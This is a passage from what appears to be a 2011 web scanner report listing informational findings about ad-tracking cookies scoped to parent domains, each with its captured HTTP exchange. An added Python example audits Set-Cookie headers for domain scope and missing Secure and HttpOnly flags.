Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1315097051_34024:68283:2:0:92_34024:68292:2:118888:118970_34023:68293:1:119601:119601; kwd=1_1315097051; scg=1_1315097051; ppd=1_1315097051; act=1_1315097051; uid=1_1315097284_1314893682667:5756480826433243

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:55:00 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: cre=1_1315097700_34021:68285:2:0:415_34024:68283:2:649:741_34024:68292:2:119537:119619_34023:68293:1:120250:120250; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:55:00 GMT; Path=/
Set-Cookie: uid=1_1315097700_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:55:00 GMT; Path=/
Set-Cookie: kwd=1_1315097700; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:55:00 GMT; Path=/
Set-Cookie: scg=1_1315097700; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:55:00 GMT; Path=/
Set-Cookie: ppd=1_1315097700; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:55:00 GMT; Path=/
Set-Cookie: act=1_1315097700; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:55:00 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 00:55:00 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 5492

<style type="text/css">body {margin: 0px; padding: 0px;}</style><style type="text/css">
/*
TODO customize this sample style
Syntax recommendation http://www.w3.org/TR/REC-CSS2/
*/

button.fb-fi
...[SNIP]...

11.26. http://leadback.advertising.com/adcedge/lb

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&betr=tc=99999&guidm=1:1765ifu1akkc79&bnum=15702 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2=/nsYO9aFHYIiGW8sQdwSkaYxSKMCdbdBwB; GUID=MTMxNTA5NzA4NzsxOjE3NjVpZnUxYWtrYzc5OjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 01:06:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=b8sYO9aFHYIiGT8sQdwSkaMxSKMCdbdBwB; domain=advertising.com; expires=Tue, 03-Sep-2013 01:06:35 GMT; path=/
Set-Cookie: GUID=MTMxNTA5ODM5NTsxOjE3NjVpZnUxYWtrYzc5OjM2NQ; domain=advertising.com; expires=Tue, 03-Sep-2013 01:06:35 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Sun, 04 Sep 2011 02:06:35 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

11.27. http://nmsacramento.112.2o7.net/b/ss/nmsacramento/1/H.20.3/s83257504000794

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nmsacramento.112.2o7.net
Path:   /b/ss/nmsacramento/1/H.20.3/s83257504000794

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/nmsacramento/1/H.20.3/s83257504000794?AQB=1&ndh=1&t=3/8/2011%2019%3A48%3A59%206%20300&pageName=Product%3A%20Blogs%3A%20Moveable%20Type%3A%20Sacramento%20Bee%20--%20The%20State%20Worker&g=http%3A//blogs.sacbee.com/the_state_worker/%23navlink%3Dnavdrop&r=http%3A//www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html&cc=USD&ch=Sacramento%20Bee%3A%20Product%3A%20Blogs%3A%20Moveable%20Type%3A%20The%20State%20Worker&server=blogs.sacbee.com&events=event7&c1=http%3A//blogs.sacbee.com/the_state_worker/&h1=SAC%7CSacramento%20Bee%7CNews%7CState%7CGovtPolitics%7C%7C%7CProduct%3A%20Blogs%3A%20Moveable%20Type%3A%20The%20State%20Worker&c3=*Product&v3=Cal%20Monthly%20Visit%20Number%3A%201&c4=Sacramento%20Bee%3A%20Moveable%20Type%3A%20Staff%3A%20&v4=Product%3A%20Blogs%3A%20Moveable%20Type%3A%20Sacramento%20Bee%20--%20The%20State%20Worker&c5=.threshold&c6=SAC%7CSacramento%20Bee%7CNews%7CState%7CGovtPolitics%7C%7C%7CProduct%3A%20Blogs%3A%20Moveable%20Type%3A%20The%20State%20Worker&c13=Unknown&c20=%7CU%3A%20Sacramento%20Bee%3A%20Product%3A%20Blogs%3A%20Moveable%20Type%3A%20The%20State%20Worker%20%3A%20blogs.sacbee.com&c33=8%3A30PM&c34=Saturday&c39=%20%23navlink%3Dnavdrop&c42=Cal%20Monthly%20Visit%20Number%3A%201&c43=Story%3A%203883102%7CSprint%20could%20be%20winner%20in%20thwarted%20T-Mobile-AT%26T%20deal&c44=Sto%3A%203000px%20%3A%203sc%20%3A%20100%25&c48=YTextAd%3A%20*Product%3Ablogs.sacbee.com%3AProduct%3A%20Blogs%3A%20Moveable%20Type%3A%20The%20State%20Worker&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1233&bh=1037&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&pid=Story%3A%203883102%7CSprint%20could%20be%20winner%20in%20thwarted%20T-Mobile-AT%26T%20deal&pidt=1&oid=http%3A//blogs.sacbee.com/the_state_worker/%23navlink%3Dnavdrop&ot=A&AQE=1 HTTP/1.1
Host: nmsacramento.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 01:04:36 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_bax7Fmox7Emaibxxc=[CS]v4|27316752051606A2-400001778004310F|4E62CAD6[CE]; Expires=Fri, 2 Sep 2016 01:04:36 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sat, 03 Sep 2011 01:04:36 GMT
Last-Modified: Mon, 05 Sep 2011 01:04:36 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E62CEA4-0D28-2AB4C075"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
Location: http://b.scorecardresearch.com/r?c2=6035363&d.c=gif&d.o=nmsacramento&d.x=62294659&d.t=page&d.u=http%3A%2F%2Fblogs.sacbee.com%2Fthe_state_worker%2F%23navlink%3Dnavdrop
xserver: www388
Content-Length: 0
Content-Type: text/plain


11.28. http://optimized-by.rubiconproject.com/a/4462/5032/7102-15.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/4462/5032/7102-15.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/4462/5032/7102-15.js?cb=0.3047261026222259 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; ruid=154e62c97432177b6a4bcd01^1^1315096948^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=5032^1&9346^1; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; ses15=5032^1&9346^1; csi15=3203911.js^1^1315097079^1315097079; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:53:59 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4462/5032; expires=Sun, 04-Sep-2011 01:53:59 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Sun, 04-Sep-2011 01:53:59 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=5032^3&9346^1; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=111960; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3214998.js^2^1315097284^1315097639&3203911.js^1^1315097079^1315097079; expires=Sun, 11-Sep-2011 00:53:59 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1133

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3214998"
...[SNIP]...

11.29. http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/4462/5032/7102-2.html

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/4462/5032/7102-2.html HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; ruid=154e62c97432177b6a4bcd01^1^1315096948^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=5032^1&9346^1; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rdk=4462/5032; rdk15=0; ses15=5032^2&9346^1; csi15=3214998.js^1^1315097284^1315097284&3203911.js^1^1315097079^1315097079

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:55:23 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4462/5032; expires=Sun, 04-Sep-2011 01:55:23 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Sun, 04-Sep-2011 01:55:23 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=5032^3&9346^1; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=111876; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3214995.js^3^1315096957^1315097723; expires=Sun, 11-Sep-2011 00:55:23 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1228

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...
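Every finding from 11.15 to 11.29 is the same check: the response sets a cookie whose Domain attribute is an ancestor of the host that issued it. The following is an added example of that check, written here for this report and not taken from the scanner or from any of the sites captured: it parses Set-Cookie headers with Python's standard http.cookies module, classifies each cookie's scope the way RFC 6265 does (a leading dot in Domain is ignored; a Domain that does not match the host is rejected by the browser), and also records whether Secure and HttpOnly were set. The sample headers are copied from the responses in these findings; the last entry is a constructed host-only control that does not come from the report.

```python
"""Audit Set-Cookie headers for parent-domain scoping and missing flags.
Added example for findings 11.15-11.29; not code from the report."""
from http.cookies import SimpleCookie

# (issuing host, Set-Cookie header) pairs copied from the responses above,
# plus one constructed control at the end (not from the report).
SAMPLES = [
    ("ce.lijit.com",
     "ljtrtb=eJyrVjJUslIysjQytbQ0NrQwsjQ3NTE0MTc3VKoFAFC9Bds%3D; "
     "expires=Mon, 03-Sep-2012 00:58:08 GMT; path=/; domain=.lijit.com"),
    ("ib.adnxs.com",
     "uuid2=6422714091563403120; path=/; expires=Sat, 03-Dec-2011 00:57:20 GMT; "
     "domain=.adnxs.com; HttpOnly"),
    ("image2.pubmatic.com",
     "PUBRETARGET=78_1409703834.82_1409705283; domain=pubmatic.com; "
     "expires=Wed, 03-Sep-2014 00:48:03 GMT; path=/"),
    ("optimized-by.rubiconproject.com",
     "rdk=4462/5032; expires=Sun, 04-Sep-2011 01:53:59 GMT; max-age=60; "
     "path=/; domain=.rubiconproject.com"),
    ("d.p-td.com",
     "uid=4018048898892878422; Domain=.p-td.com; "
     "Expires=Fri, 02-Mar-2012 00:48:08 GMT; Path=/"),
    # Constructed control: no Domain attribute, so the cookie is host-only.
    ("login.example.test", "sid=opaque; Path=/; Secure; HttpOnly"),
]


def cookie_scope(host, domain_attr):
    """Classify how a browser scopes the cookie relative to the issuing host."""
    host = host.lower()
    domain = domain_attr.lower().lstrip(".")  # RFC 6265 s5.2.3: leading dot ignored
    if not domain:
        return "host-only"
    if domain == host:
        return "host-and-subdomains"
    if host.endswith("." + domain):
        return "parent-domain"  # the case these findings report
    return "rejected"  # s5.3 step 6: Domain does not domain-match the host


def audit(host, set_cookie):
    """Return one record per cookie in the header with its scope and flags."""
    jar = SimpleCookie()
    jar.load(set_cookie)
    records = []
    for name, morsel in jar.items():
        records.append({
            "host": host,
            "name": name,
            "scope": cookie_scope(host, morsel["domain"]),
            # Every host under this name receives the cookie.
            "shared_with": morsel["domain"].lstrip(".").lower() or host,
            "secure": bool(morsel["secure"]),
            "httponly": bool(morsel["httponly"]),
        })
    return records


def parent_scoped(samples):
    """Names of cookies that every sibling subdomain of the issuer can read."""
    return [rec["name"] for host, header in samples
            for rec in audit(host, header) if rec["scope"] == "parent-domain"]


if __name__ == "__main__":
    for host, header in SAMPLES:
        for rec in audit(host, header):
            flags = ("Secure" if rec["secure"] else "no Secure",
                     "HttpOnly" if rec["httponly"] else "no HttpOnly")
            print(f"{host:32} {rec['name']:12} {rec['scope']:20} "
                  f"{rec['shared_with']:22} " + ", ".join(flags))
```

Run against the samples, all five report cookies come out as parent-domain, only uuid2 carries HttpOnly, and none carries Secure, so each is also sent over plain HTTP to any host under the parent name. The check stops at the label boundary ("ce.lijit.com" does not match a Domain of "jit.com"), which is what browsers do; it does not consult the Public Suffix List, so a Domain such as "co.uk" would be classified as parent-domain here even though browsers reject it.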

11.30. http://pix04.revsci.net/D08734/a1/0/0/0.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /D08734/a1/0/0/0.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESEOfruwaKEzWGvrIKzVwqd-c&cver=1 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; udm_0=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; NETSEGS_I07714=52e7dd6cb6c0ef21&I07714&0&4e87b3cb&0&&4e619905&68d836b0a1fd7963e56f000759258b9c; rtc_o6zg=MLsvsLFOMQ5vJpHEvNGJwe3bNDdPqDE7tney9j8XHZxVnCKr9EgfSAe8w4hAY+1S3GROT8pMx0Dk4VfWE4HqpYJRGPSKk1HuHKzz4/0koCkSq5JBQoSmi7zZNoJT0NEAALAtP6fzvZAWXZ+loThQ0WihkO+/o6mSdVwKrgqt65uVFEp8XI4N3ZpjmWzsphrfMQP8kY5P/8jQTq0b7REA668mU80lpsjMzKwzFbryqD4V41L+z9JHKh4rhVL47OYEWipj787OGH+L5uaHYXYNbKq2OBL8iIXHGM+Swv9IOQ5FriyvLu/Z2CaUGb3SZd2dky0d4PEM7QQNkWvbJUUcJPbvZf20Hhlhq8CwdVhIbBVx3SiCZYBPlHik9o2CQ9gk9RT6MakYoJ+gbc9aoDyd41769iZf5VrCQMs1k0du/3q50I3PWYMPgxVJ3cffzI135Z/BwA==; rsi_segs_1000000=pUPFeMPC7nMQFmLKHV0ITey31QIddBjzAHYhBTtuzLxVqYeIB48s6jNq5rQRfJuujANMg2z1OSzDgmK46EHiCpnnSkbJdt0aEgyn07eBOqooss/IiVH+3uWO8suqG+1eoEh/82Cs3O88kec4YiFqAa3rjVYjKvyPYa/IUIgptmEwacIExC+mHkn1XTh7V8/ZBre5UO8GZbswedStCMJ7UnFnJfymFXcGIeHBb+r5/YGNhB+d; rsiPus_p40C="MLtXrtMvti9nYAD3bv6uJZDWPvAb5rmAbOC1vSsaeKCIpRg1Q0dHTe55BQsYxevmIbNHamJI0N8JSN5tTqULMCjmqoEZiTVnsWkDuaFDB3Wxsgb+dqUDsAhR88Y8/tbo5errEJSJyxK5oqjOi7yC6LapAKMgm87tdc9sJe+K+S51tsgcNG0yafNyT3Mj6ez3yHCqVDZl3JSrA7SGDKtmSqnlcl/KTuqikN3SUl2KPkpJFQVc3m7etpySLFnZBwIjKh7tGEbtQyeLQjD5a5oobWtv9loXNaHqohXE75f1bUXMWji8BYpbX/ehxZr8ddKQTQMDPFg="; rsi_us_1000000="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"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFOM9CLgIMVZ94v40baTDzlRIkdUWSQGfFxfA6hPpUKyeNNoj0iIN6Cv9sUGvLEXvKAFu9JT7uIABOODftm+QaDSbsuf25QFhAJtgIo+GwOzrVo4YkL0xbKLuQiu28WRitUy3Kb67rhK+xW853LY2RBECs8dSNYOibsRLGdMUdsI2f//Emd6k6iE1p2Wou0rWthgALXeX8ILkdmFAdhV3cQvpFqMGLq/eFx91Js8rLMz0cCNgkRarHvfvZ2ZEHYUfwWV/ukw==; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:52:31 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=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; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:52:31 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 00:52:30 GMT

GIF89a.............!.......,...........D..;

11.31. http://pix04.revsci.net/D08734/a1/0/3/0.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /D08734/a1/0/3/0.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a1/0/3/0.js?D=DM_LOC%3Dhttp%253A%252F%252Fti.com%253Fscore%253D000%2526zip%253D%2526byear1%253D%2526sex1%253D%2526ts1%253D%2526byear2%253D%2526sex2%253D%2526ts2%253D HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; udm_0=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; NETSEGS_I07714=52e7dd6cb6c0ef21&I07714&0&4e87b3cb&0&&4e619905&68d836b0a1fd7963e56f000759258b9c; rtc_o6zg=MLsvsLFOMQ5vJpHEvNGJwe3bNDdPqDE7tney9j8XHZxVnCKr9EgfSAe8w4hAY+1S3GROT8pMx0Dk4VfWE4HqpYJRGPSKk1HuHKzz4/0koCkSq5JBQoSmi7zZNoJT0NEAALAtP6fzvZAWXZ+loThQ0WihkO+/o6mSdVwKrgqt65uVFEp8XI4N3ZpjmWzsphrfMQP8kY5P/8jQTq0b7REA668mU80lpsjMzKwzFbryqD4V41L+z9JHKh4rhVL47OYEWipj787OGH+L5uaHYXYNbKq2OBL8iIXHGM+Swv9IOQ5FriyvLu/Z2CaUGb3SZd2dky0d4PEM7QQNkWvbJUUcJPbvZf20Hhlhq8CwdVhIbBVx3SiCZYBPlHik9o2CQ9gk9RT6MakYoJ+gbc9aoDyd41769iZf5VrCQMs1k0du/3q50I3PWYMPgxVJ3cffzI135Z/BwA==; rsi_segs_1000000=pUPFeMPC7nMQFmLKHV0ITey31QIddBjzAHYhBTtuzLxVqYeIB48s6jNq5rQRfJuujANMg2z1OSzDgmK46EHiCpnnSkbJdt0aEgyn07eBOqooss/IiVH+3uWO8suqG+1eoEh/82Cs3O88kec4YiFqAa3rjVYjKvyPYa/IUIgptmEwacIExC+mHkn1XTh7V8/ZBre5UO8GZbswedStCMJ7UnFnJfymFXcGIeHBb+r5/YGNhB+d; rsiPus_p40C="MLtXrtMvti9nYAD3bv6uJZDWPvAb5rmAbOC1vSsaeKCIpRg1Q0dHTe55BQsYxevmIbNHamJI0N8JSN5tTqULMCjmqoEZiTVnsWkDuaFDB3Wxsgb+dqUDsAhR88Y8/tbo5errEJSJyxK5oqjOi7yC6LapAKMgm87tdc9sJe+K+S51tsgcNG0yafNyT3Mj6ez3yHCqVDZl3JSrA7SGDKtmSqnlcl/KTuqikN3SUl2KPkpJFQVc3m7etpySLFnZBwIjKh7tGEbtQyeLQjD5a5oobWtv9loXNaHqohXE75f1bUXMWji8BYpbX/ehxZr8ddKQTQMDPFg="; rsi_us_1000000="pUMdJT+nPwIU1E3iQFs1Lw7NfjtDG6P2dL1poyhgAWP5Eo4es3kaxW1feZP1YNm+vskrklkV+oIYNjONkByQANVsWNI2LUQx8TCq2WGPl5VXzYIGTGOuqjioCwYxcCLHmCkxz4ESp094zcjlIQUTzGncppB8+UZ13jX8XjRx0I3BL+KAGqLYtL1yR5cosgVr9TChjigtCT7xLSmTxoSu7GRigj7TGlm9TWroY0Q39+iNlTc3BrdjBe0HTkWYH0ShlG+acfzLReAv8qXohHLhe5F9dMgHJSO83a8oSnKmeKGYbW9i7MxX9f9dHDkI4yUr7YhzEgSpDzIQoN8mjvDq8uAicdwkS3Vj6tHxg4FjZP5oJKn7RMzXdrHwiAm5HkJNNq7rKZe60tdAVpLfFLIZU2NXYF5Ng4nUe9B7vLt/JeKgOkuoMXRBd9LPrc+/Bs4Zy2M8IMqrZma4/6vOjeaSPoErPG5h9v54soIwRm/p6mPbNHPXqMGI6iAEpBp39vZnCJ8TPcPuiSkxaucITwjR4ls8ahmnjLIaytIoGLCJ/Gk+WsM5cUzAfduzHzcfr1tiWa348TV6PwF3eayssB/NpybGnJ4mkGwbtdvs76dMdYRClhQnokDRRFqfqHlR5S6hY3Cufhpq2otZn8gHLLXi0UYaHuTtyjHcoW9gZagVsKBU5RI+04gGuvIwxRnBEKwniHi8ZYHXm0BGAaf2rvKUw7FcsM1MDjjAtYrWzUobzJubFmLscTjITZE83wdVVKbPTHCW+E6UqZY3vs2GJOkpG7gaCzt7i/PmMgRey9Ep7w5TQuNKaPbYm0+V7iZOGAnsWlpG0D2TcSxjX6nkaxa+P0zbU7mixMT1h5TkHQHrU4mEOBygWqOWYZoz2ReGBIBfVZfHHBb73A=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJ0/FLgIMlrE7uk0GmV2eAbqnnz9mBC2OsJRojxDyMaIk9TEJ3YH2aKvvUGIZ/u6UZUfRMVa6yiD7njMXjPX3N4DMhY2ZviRGuNIpq5mAQ5cYacVa3palkMmqiTA44pzy0TsSp9dZGV0wREhmZA++cX1MA6EP1ziTd85x9KCxFvIWPIoOtMDGZLcM0Kdb1Un8sm56weCl5qnY0SxvtyYPOEr5SCNdUsKIvYBTSfQNKKkClanTYJF2y5vVLyjL4pXJ2Go=; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:51:15 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=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; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:51:15 GMT; Path=/
X-Proc-ms: 5
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:51:14 GMT
Content-Length: 444

/* AG-develop 12.7.1-99 (2011-08-08 18:20:02 UTC) */
rsinetsegs = ['D08734_72639','D08734_72674','D08734_72861','D08734_72132','D08734_72122','D08734_72123','D08734_72124','D08734_72125','D08734_72126
...[SNIP]...

